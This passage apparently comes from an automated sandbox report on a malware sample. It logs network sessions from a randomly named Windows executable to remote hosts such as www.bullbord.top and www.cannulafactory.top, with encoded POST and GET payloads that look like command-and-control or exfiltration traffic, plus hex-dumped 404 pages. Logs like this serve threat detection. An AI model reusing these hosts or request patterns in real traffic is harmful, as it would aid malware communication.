                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:37.831171989 CEST1289INData Raw: 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37
                                                                                                                                                                                                                                                              Data Ascii: :miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              19192.168.11.2049760203.161.46.20580900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202300072 CEST1289OUTPOST /veti/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.bullbord.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.bullbord.top/veti/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 79 44 46 52 74 42 2f 66 2f 64 70 67 68 67 6e 54 55 77 6d 43 70 4d 6a 6e 65 41 4a 52 75 75 57 6d 64 4f 50 38 48 4b 6e 79 4c 5a 46 44 70 4c 38 54 74 5a 75 64 78 4a 68 76 7a 57 44 68 70 57 42 68 53 4d 71 6a 68 6a 61 63 62 35 71 5a 4b 61 69 55 39 76 70 4b 69 6b 73 51 4c 65 56 73 34 43 4c 43 31 4f 43 2b 38 68 4b 46 78 59 76 58 4d 71 34 71 54 63 36 56 62 2f 41 37 54 69 31 6e 35 6d 63 58 62 6d 2b 4e 39 47 39 58 41 48 43 63 39 73 4b 2b 64 78 63 65 31 78 55 63 75 30 73 57 52 35 71 69 55 64 56 6c 67 4c 35 67 76 68 48 75 30 73 45 33 67 65 6e 38 63 37 58 78 35 34 4b 51 7a 62 45 4a 36 52 33 77 39 5a 4e 6b 64 30 6b 32 4f 66 6d 72 68 49 53 30 45 4a 69 41 49 49 71 41 41 6c 49 6b 6c 63 32 7a 43 4c 70 68 6c 6d 69 4a 57 2f 47 64 76 65 6a 4d 61 54 42 75 6d 46 51 65 7a 2f 4d 56 57 44 4b 4f 4e 2b 55 79 32 55 79 70 56 37 4e 4d 5a 49 6d 64 4d 73 37 38 67 66 33 44 5a 52 61 77 58 6f 56 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKeyDFRtB/f/dpghgnTUwmCpMjneAJRuuWmdOP8HKnyLZFDpL8TtZudxJhvzWDhpWBhSMqjhjacb5qZKaiU9vpKiksQLeVs4CLC1OC+8hKFxYvXMq4qTc6Vb/A7Ti1n5mcXbm+N9G9XAHCc9sK+dxce1xUcu0sWR5qiUdVlgL5gvhHu0sE3gen8c7Xx54KQzbEJ6R3w9ZNkd0k2OfmrhIS0EJiAIIqAAlIklc2zCLphlmiJW/GdvejMaTBumFQez/MVWDKON+Uy2UypV7NMZImdMs78gf3DZRawXoVmtYZP4sMpImE0wnQs0nqTcjE/T4Kn+URaDDrfSd+dHPPexV0lnnMbkMfJvJg2on9fWfjcPnUw4L4qTqYZxfYeRWx08FI9LYcnZxCKwwUz8hcFRHv9VDk+rUg+kxF6tmYlhm2/CSvd8HK99HT61VLbpLJr2rW9szfUXXCR9WWl4X4MQkl8eGYVkWG/7KjKIs1LsaBuRFQLOck2OTM+EoDODJMR/t+oKtUDkuiI5YyAwbA1hKdYIXhVNmqOSRmDw2SGO3/YLuFyTey15qRLIanwJnX73CVwtzatjV/D5ZWei1RXHajzyVdtpFluhk3hG5imYiMEQ8geri1CzToNUdl
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202347994 CEST1289OUTData Raw: 30 56 6d 53 61 77 39 33 61 4a 49 45 62 45 33 70 59 4c 43 34 36 6b 53 35 31 45 43 4e 72 79 6c 39 71 30 73 6b 6f 69 6e 41 50 55 71 6b 6e 2b 61 46 4f 63 4d 72 6c 77 6a 6a 4e 59 34 77 2f 35 5a 4b 5a 43 52 59 4e 41 66 71 6e 30 4f 49 6e 51 7a 33 66 67
                                                                                                                                                                                                                                                              Data Ascii: 0VmSaw93aJIEbE3pYLC46kS51ECNryl9q0skoinAPUqkn+aFOcMrlwjjNY4w/5ZKZCRYNAfqn0OInQz3fgL1xi2ostUuMyLLU+0alm3mbAjXW6/Ea21Xb0cCI5ORzRqaYmO/N9DyW3BICmE3DUXWQkfMTqfSXHEsqHU/XaJXIY/pAOa6f9GxSTrXL2Ai1Axo1BqRyr3I6UEidiqLz+T/LIgRCgHWVuOz5mmLD/S6sVwF+PEf/Wf
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.202398062 CEST5402OUTData Raw: 6f 6c 59 42 47 76 46 6f 59 6d 34 52 73 34 2f 64 4a 38 32 4f 66 62 5a 39 57 6b 51 5a 68 54 36 71 49 68 59 73 4e 36 6b 38 34 50 6d 73 77 46 4b 4e 78 57 63 44 37 52 79 61 78 52 4d 4c 41 44 69 4e 38 6b 53 72 50 31 70 2f 2f 39 31 2f 70 31 63 71 61 66
                                                                                                                                                                                                                                                              Data Ascii: olYBGvFoYm4Rs4/dJ82OfbZ9WkQZhT6qIhYsN6k84PmswFKNxWcD7RyaxRMLADiN8kSrP1p//91/p1cqaftzMB37FNkKC9j/tcTGosZSVXcn0xsX3ldoWI4B0+2+OuW+DuylSw1K4QC5d9YsX0qgFDaNVsM5kT3+Ku+//xmydgjbhZ5Vzkj5NPxW/qWEfAKyvVOwGbdljcesW3HH1Bhke3fNU/izN2y3f/dLuXoPVHOJbUaRY4L
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372203112 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:40 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372242928 CEST1289INData Raw: 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: rGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" st
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372343063 CEST1289INData Raw: 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d 34 31 2e 32 33 31 39 35 33 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                                                                                                                                                                                              Data Ascii: 59565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path449
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372359037 CEST1289INData Raw: 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c
                                                                                                                                                                                                                                                              Data Ascii: l-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372441053 CEST1289INData Raw: 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b
                                                                                                                                                                                                                                                              Data Ascii: 44 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372456074 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39
                                                                                                                                                                                                                                                              Data Ascii: id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372606039 CEST1289INData Raw: 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31
                                                                                                                                                                                                                                                              Data Ascii: ,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372806072 CEST1289INData Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e
                                                                                                                                                                                                                                                              Data Ascii: 1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:40.372911930 CEST1289INData Raw: 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;s


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              20192.168.11.2049761203.161.46.20580900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:42.902000904 CEST549OUTGET /veti/?9B6h=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068521976 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:42 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068536997 CEST1289INData Raw: 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35
                                                                                                                                                                                                                                                              Data Ascii: > </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068551064 CEST1289INData Raw: 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d 34 31 2e 32 33 31 39 35 33 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                                                                                                                              Data Ascii: -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068562031 CEST1289INData Raw: 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37
                                                                                                                                                                                                                                                              Data Ascii: ill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068648100 CEST1289INData Raw: 35 2e 33 33 33 31 35 33 2c 32 39 2e 33 33 32 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b
                                                                                                                                                                                                                                                              Data Ascii: 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068661928 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c
                                                                                                                                                                                                                                                              Data Ascii: <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068914890 CEST1289INData Raw: 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30
                                                                                                                                                                                                                                                              Data Ascii: 45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-op
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068929911 CEST1289INData Raw: 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d
                                                                                                                                                                                                                                                              Data Ascii: stroke-opacity:1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069133997 CEST1289INData Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31
                                                                                                                                                                                                                                                              Data Ascii: " cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-d
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069150925 CEST1289INData Raw: 20 31 30 2e 35 30 36 30 39 2c 2d 31 35 2e 31 35 36 31 32 20 38 2e 30 35 35 34 35 2c 2d 33 2e 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: 10.50609,-15.15612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.229803085 CEST1289INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                                                                                              Data Ascii: stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.4995


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              21192.168.11.204976223.227.38.7480900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.143647909 CEST829OUTPOST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
